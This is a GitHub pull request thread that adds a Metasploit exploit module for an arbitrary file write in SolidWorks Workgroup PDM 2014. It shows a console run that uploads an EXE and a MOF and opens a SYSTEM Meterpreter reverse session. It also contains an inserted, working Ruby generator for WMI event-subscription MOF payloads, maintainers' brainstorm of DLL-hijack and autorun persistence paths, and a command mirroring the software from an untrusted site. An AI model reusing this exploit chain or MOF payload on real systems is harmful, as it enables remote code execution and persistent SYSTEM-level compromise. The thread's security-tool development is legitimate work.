Add SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write #3030

Merged
merged 3 commits into from Mar 5, 2014


4 participants

@bcoles
Contributor
bcoles commented Feb 24, 2014

Add SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write exploit module.

SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write

msf > use exploit/windows/misc/solidworks_workgroup_pdmwservice_wbem
msf exploit(solidworks_workgroup_pdmwservice_wbem) > set RHOST 192.168.247.134
RHOST => 192.168.247.134
msf exploit(solidworks_workgroup_pdmwservice_wbem) > set VERBOSE true
VERBOSE => true
msf exploit(solidworks_workgroup_pdmwservice_wbem) > check

[*] 192.168.247.134:30000 - Received reply (4 bytes)
[*] 192.168.247.134:30000 - The target service is running, but could not be validated.
msf exploit(solidworks_workgroup_pdmwservice_wbem) > run

[*] Started reverse handler on 192.168.247.128:4444 
[*] 192.168.247.134:30000 - Sending EXE (73802 bytes)
[*] 192.168.247.134:30000 - Received reply (4 bytes)
[*] 192.168.247.134:30000 - Sending MOF (2231 bytes)
[*] 192.168.247.134:30000 - Received reply (4 bytes)
[*] Sending stage (769024 bytes) to 192.168.247.134
[*] Meterpreter session 1 opened (192.168.247.128:4444 -> 192.168.247.134:1314) at 2014-02-24 11:24:01 -0500
[+] Deleted wbem\mof\good\KocTtKc.mof
[!] This exploit may require manual cleanup of: WnwxXUjKQYGyh.exe

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
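The module name ends in `_wbem`, and the run above sends an EXE, then a MOF, and afterwards deletes `wbem\mof\good\<name>.mof`. The block below is an added, stand-alone Ruby example of that MOF auto-compile technique; it is not the module's code and not Metasploit's WbemExec mixin. It assumes the classic behaviour: on Windows XP / Server 2003 the WMI service compiles any `.mof` dropped into `%SystemRoot%\system32\wbem\mof\` and moves it to `wbem\mof\good\` on success, whereas Vista and later do not (hence the Startup-folder fallback discussed later in this thread). The filter name, consumer name, WQL query and EXE path are placeholders chosen here, and `mof_instances` / `persistence_mof?` are a small defender-side check for a recovered MOF, not anything the module provides.

```ruby
#!/usr/bin/env ruby
# Added example (not the Metasploit module's own code): build the kind of MOF
# that wbem-style arbitrary-file-write exploits drop next to an uploaded EXE.
# Assumption: XP/2003 WMI auto-compiles %SystemRoot%\system32\wbem\mof\*.mof
# as SYSTEM and moves the file to wbem\mof\good\ afterwards.

# Permanent WMI event subscription: an __EventFilter fires on a WQL query,
# an ActiveScriptEventConsumer runs JScript that launches the EXE, and a
# __FilterToConsumerBinding ties the two together.  Names and query are
# placeholders; a real module would randomise them.
MOF_TEMPLATE = <<~'MOF'
  #pragma namespace("\\\\.\\root\\subscription")

  instance of __EventFilter as $EventFilter
  {
      EventNamespace = "Root\\Cimv2";
      Name  = "%<filter>s";
      Query = "Select * From __InstanceModificationEvent Where TargetInstance Isa \"Win32_LocalTime\" And TargetInstance.Second = 5";
      QueryLanguage = "WQL";
  };

  instance of ActiveScriptEventConsumer as $Consumer
  {
      Name = "%<consumer>s";
      ScriptingEngine = "JScript";
      ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\");\nWSH.Run(\"%<exe>s\", 0);";
  };

  instance of __FilterToConsumerBinding
  {
      Consumer = $Consumer;
      Filter = $EventFilter;
  };
MOF

# A Windows path inside the JScript string needs each backslash doubled, and
# that JScript is itself a MOF string literal, so every backslash is quadrupled.
def mof_js_path(path)
  raise ArgumentError, 'quotes are not allowed in the path' if path.include?('"')
  path.gsub('\\') { '\\\\' * 2 }
end

# Render the MOF for a dropped executable (exe_path as it will exist on the target).
def build_mof(exe_path, filter_name:, consumer_name:)
  format(MOF_TEMPLATE, filter: filter_name, consumer: consumer_name,
                       exe: mof_js_path(exe_path))
end

# Defender-side helper: which WMI classes does a MOF instantiate?
def mof_instances(mof)
  mof.scan(/^\s*instance of (\S+)/).flatten
end

# A filter, a binding and some *EventConsumer together are the signature of a
# permanent event subscription, which is what to look for in wbem\mof\good.
def persistence_mof?(mof)
  classes = mof_instances(mof)
  (%w[__EventFilter __FilterToConsumerBinding] - classes).empty? &&
    classes.any? { |c| c.end_with?('EventConsumer') }
end

if __FILE__ == $PROGRAM_NAME
  # Placeholder EXE name; a real run would use the randomised name the module chose.
  puts build_mof('C:\\Windows\\System32\\wbem\\mof\\WnwxXUjKQYGyh.exe',
                 filter_name: 'filt_example', consumer_name: 'cons_example')
end
```

Running the script prints the MOF as it would be written next to the EXE. The cleanup line in the run above (`Deleted wbem\mof\good\...mof`) covers only the compiled MOF; the subscription it created and the EXE it launched are what the "manual cleanup" warning refers to, so an incident responder should check `root\subscription` for leftover filters and consumers as well as the dropped binary.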
@wchen-r7
Contributor

Travis build is complaining about msftidy. The fix was already applied in #3031.

So when this PR merges to master, it should be green:

$ git checkout upstream/pr/3030
Note: checking out 'upstream/pr/3030'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

  git checkout -b new_branch_name

HEAD is now at a29c6cd... Add SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write
$ git checkout -b master_pr3030_test
Switched to a new branch 'master_pr3030_test'
$ git merge -S --no-ff upstream-master
Merge made by the 'recursive' strategy.
 modules/encoders/x86/opt_sub.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
$ rspec 
ActiveRecord::ConnectionAdapters::ConnectionPool ............
FastLib .....*.....**..
Msf::Simple::Framework .....
Msf::DataStore ............
Msf::Exe::SegmentInjector .................
Msf::Exploit::Capture ..****...
Msf::Exploit::Remote::HttpClient ........................
Msf::Exploit::Remote::HttpServer ......
Msf::Exploit::Remote::BrowserExploitServer .................
Msf::Exploit::Remote::FirefoxAddonGenerator ..
Msf::Framework ...*
Msf::Handler::ReverseHttp::UriChecksum ...........
Msf::ModuleManager .....................................................
Msf::Module .............................................................................................................................................................................................................................................
Msf::Modules::Error .........
Msf::Modules::Loader::Archive ...............
Msf::Modules::Loader::Base ..................................................................................................../Users/wchen/rapid7/msf/lib/msf/core/modules/loader/base.rb:599: warning: already initialized constant Mod0
........
Msf::Modules::Loader::Directory .........
Msf::Modules::MetasploitClassCompatibilityError ...
Msf::Modules::Namespace ........................................
Msf::Modules::VersionCompatibilityError .........
Msf::OptionContainer .
Msf::OptAddressRange ............................
Msf::OptAddress ..............
Msf::OptBool ............
Msf::OptEnum .....
Msf::OptInt ...............
Msf::OptPath .........
Msf::OptPort ..........
Msf::OptRaw .....
Msf::OptRegexp ......
Msf::PayloadGenerator ...........................................*..........................
Msf::Post::Windows::Priv ....
Msf::TaskManager .......
Msf::DBManager::Export ........................
Msf::DBManager .....................................................................................................................................................................................................................................................
Msf::Ui::Console::CommandDispatcher::Core ......
Msf::Ui::Console::CommandDispatcher::Db ....*......**
Msf::Util::EXE ...........................................................................................................
Rex::Encoding::Xor::Byte ..
Rex::Encoding::Xor::Dword ...
Rex::Encoding::Xor::Qword ...
Rex::Encoding::Xor::Word ...
Rex::Exploitation::Js::Detect ...
Rex::Exploitation::Js::Memory ...
Rex::Exploitation::Js::Network ..
Rex::Exploitation::Js::Utils .
Rex::Exploitation::RopDb ..............
Rex::FileUtils ..........
Rex::Parser::NmapXMLStreamParser ....
Rex::Parser::Unattend ....
Rex::Post::Meterpreter::PacketParser ..
Rex::Post::Meterpreter::Tlv .....................
Rex::Post::Meterpreter::GroupTlv ....................***...................
Rex::Post::Meterpreter::Packet ....................
Rex::Proto::Http::ClientRequest ............................
Rex::Proto::Http::Client ......*****.***.........
Rex::Proto::Http::Response .....
Rex::Proto::PJL::Client ................
Rex::RandomIdentifierGenerator ..................
Rex::Socket::RangeWalker .............................
Rex::Socket ...........................
Rex::SSLScan::Result .....................................................................................
Rex::SSLScan::Scanner ....................
Rex::Text ........
Msfcli .........................................
Msfupdate .............................................
CPassword ..
VirusTotalUtility ................

Pending:
  FastLib class methods dump without compression and without encryption cache Fix https://www.pivotaltracker.com/story/show/38730815
    # No reason given
    # ./spec/lib/fastlib_spec.rb:94
  FastLib class methods list with cached dump should have dump cached
    # Fix https://www.pivotaltracker.com/story/show/38730815
    # ./spec/lib/fastlib_spec.rb:202
  FastLib class methods list with cached dump should list archived paths
    # Fix https://www.pivotaltracker.com/story/show/38730815
    # ./spec/lib/fastlib_spec.rb:206
  Msf::Exploit::Capture should confirm that pcaprub is available
    # Need to test this without stubbing check_pcaprub_loaded
    # ./spec/lib/msf/core/exploit/capture_spec.rb:40
  Msf::Exploit::Capture should open a pcap file
    # Provde a sample pcap file to read
    # ./spec/lib/msf/core/exploit/capture_spec.rb:43
  Msf::Exploit::Capture should capture from an iface
    # Mock this? Tends to need root
    # ./spec/lib/msf/core/exploit/capture_spec.rb:46
  Msf::Exploit::Capture should inject packets to an ifrace
    # Mock this? Tends to need root
    # ./spec/lib/msf/core/exploit/capture_spec.rb:49
  Msf::Framework#version conform to SemVer 2.0 syntax: http://semver.org/
    # No reason given
    # ./spec/lib/msf/core/framework_spec.rb:31
  Msf::PayloadGenerator#add_shellcode when add_code points to a valid file returns modified shellcode
    # This is a bad test and needs to be refactored
    # ./spec/lib/msf/core/payload_generator_spec.rb:315
  Msf::Ui::Console::CommandDispatcher::Db#cmd_services -np should list services that are not on a given port
    # refs redmine ticket #4821
    # ./spec/lib/msf/ui/command_dispatcher/db_spec.rb:100
  Msf::Ui::Console::CommandDispatcher::Db#db_nmap should have some specs describing its output
    # Not yet implemented
    # ./spec/lib/msf/ui/command_dispatcher/db_spec.rb:262
  Msf::Ui::Console::CommandDispatcher::Db#db_rebuild_cache should have some specs describing its output
    # Not yet implemented
    # ./spec/lib/msf/ui/command_dispatcher/db_spec.rb:266
  Rex::Post::Meterpreter::GroupTlv#add_tlvs should raise an error when given something other than nil or an array
    # RM #7598
    # ./spec/lib/rex/post/meterpreter/packet_spec.rb:232
  Rex::Post::Meterpreter::GroupTlv#add_tlvs should raise an error when given an array of objects other than hashes
    # RM #7598
    # ./spec/lib/rex/post/meterpreter/packet_spec.rb:237
  Rex::Post::Meterpreter::GroupTlv#add_tlvs should raise an error when any of the hashes are missing a key
    # RM #7598
    # ./spec/lib/rex/post/meterpreter/packet_spec.rb:242
  Rex::Proto::Http::Client should send a request and receive a response
    # need to actually set up an HTTP server to test
    # ./spec/lib/rex/proto/http/client_spec.rb:149
  Rex::Proto::Http::Client should send a request and receive a response without auth handling
    # need to actually set up an HTTP server to test
    # ./spec/lib/rex/proto/http/client_spec.rb:153
  Rex::Proto::Http::Client should send a request
    # need to actually set up an HTTP server to test
    # ./spec/lib/rex/proto/http/client_spec.rb:157
  Rex::Proto::Http::Client should test for credentials
    # Should actually respond to :has_creds
    # ./spec/lib/rex/proto/http/client_spec.rb:161
  Rex::Proto::Http::Client should send authentication
    # Not yet implemented
    # ./spec/lib/rex/proto/http/client_spec.rb:169
  Rex::Proto::Http::Client should perform digest authentication
    # need to set up an HTTP authentication challenger
    # ./spec/lib/rex/proto/http/client_spec.rb:178
  Rex::Proto::Http::Client should perform negotiate authentication
    # need to set up an HTTP authentication challenger
    # ./spec/lib/rex/proto/http/client_spec.rb:182
  Rex::Proto::Http::Client should get a response
    # need to actually set up an HTTP server to test
    # ./spec/lib/rex/proto/http/client_spec.rb:186

Finished in 3 minutes 8.1 seconds
1699 examples, 0 failures, 23 pending
@wchen-r7
Contributor

Restarted travis and passed.

@wchen-r7 wchen-r7 self-assigned this Feb 24, 2014
@wchen-r7
Contributor

@bcoles How do you get a copy of the software without being contacted by sales?

@Meatballs1
Contributor

Register with @todb-r7's mobile

@Meatballs1
Contributor

So I was trying to think of ways to autorun on > Vista but can only think of stuff that will need a restart:

  • c:\windows\system32\gathernetworkinfo.vbs seems to be on most builds but disabled in scheduled tasks

Reliant on processes doing stuff:

  • writing PSConsoleHostReadline.ps1 into the path and hoping some powershell is executed
  • writing a DLL somewhere in the path on some process that is restarted regularly? C:\Windows\System32\wbem\CRYPTBASE.dll?, C:\Windows\System32\msfte.dll?
  • writing some kind of .local or .manifest file for a frequently loaded windows process C:\Windows\WindowsShell.Manifest ? along with a DLL?
@kernelsmith
Contributor

LMFAO

On Feb 24, 2014, at 3:43 PM, Meatballs1 notifications@github.com wrote:

Register with @todb-r7's mobile



@bcoles
Contributor
bcoles commented Feb 24, 2014

@wchen-r7 Have a chat to their friendly sales reps :)

Alternatively, you could try downloading untrusted software from the internet, but I wouldn't recommend it:

wget -m -np hxxp://clubprotege.com/bpt323/Programs/Solidworks%202011/SW2011_sp0_x64_SSQ/pdmwserver/

hxxps://google.com/search?q=intitle:"index of" "solidworks" "workgroup" "msi"

@wchen-r7 wchen-r7 removed their assignment Feb 25, 2014
@wchen-r7
Contributor

@bcoles Yeah I did. Sales asked why I want one, I replied. Never heard from them again.

@bcoles bcoles closed this Mar 2, 2014
@bcoles bcoles deleted the bcoles:solidworks_workgroup_pdmwservice_wbem branch Mar 2, 2014
@bcoles bcoles reopened this Mar 2, 2014
@bcoles
Contributor
bcoles commented Mar 2, 2014

@Meatballs1 I haven't come up with a faster (and non-destructive) method.

Support for writing to startup on Vista and newer has been added in commit f008c77

@wchen-r7 wchen-r7 added a commit that referenced this pull request Mar 5, 2014
@wchen-r7 wchen-r7 Land #3030 - SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write
9d0743a
@wchen-r7 wchen-r7 merged commit 1ea3588 into rapid7:master Mar 5, 2014

1 check passed

default The Travis CI build passed